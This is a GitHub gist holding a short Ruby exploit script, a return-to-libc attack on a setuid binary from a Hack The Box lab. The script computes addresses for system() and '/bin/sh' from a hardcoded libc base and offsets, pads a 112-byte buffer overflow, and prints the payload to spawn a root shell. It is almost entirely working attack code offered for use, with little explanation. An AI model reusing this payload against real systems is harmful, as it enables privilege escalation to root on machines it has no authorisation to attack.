Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Return2LibC for a HTB setuid binary
#!/usr/bin/env ruby
# This is what we need to guess from ldd vuln
ldd_load_address = 0xb75ba000
# Next get offset of system() and its address
system_offset = 0x1e310
system_address = ldd_load_address + system_offset
# Next get offset of /bin/sh from strings -d -tx libc.6.so, minus correction
correction = 0x22000
strings_bin_sh_offset = 0x162bac
bin_sh_address = ldd_load_address + strings_bin_sh_offset - correction
# Buffer junk length from debrujin pattern
junk = "\xcc" * 112
payload = ""
payload += junk
payload += [system_address].pack('L')
payload += [bin_sh_address].pack('L') # This goes from pop ebp or something
payload += [bin_sh_address].pack('L') # This is the address that gets used
print payload
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.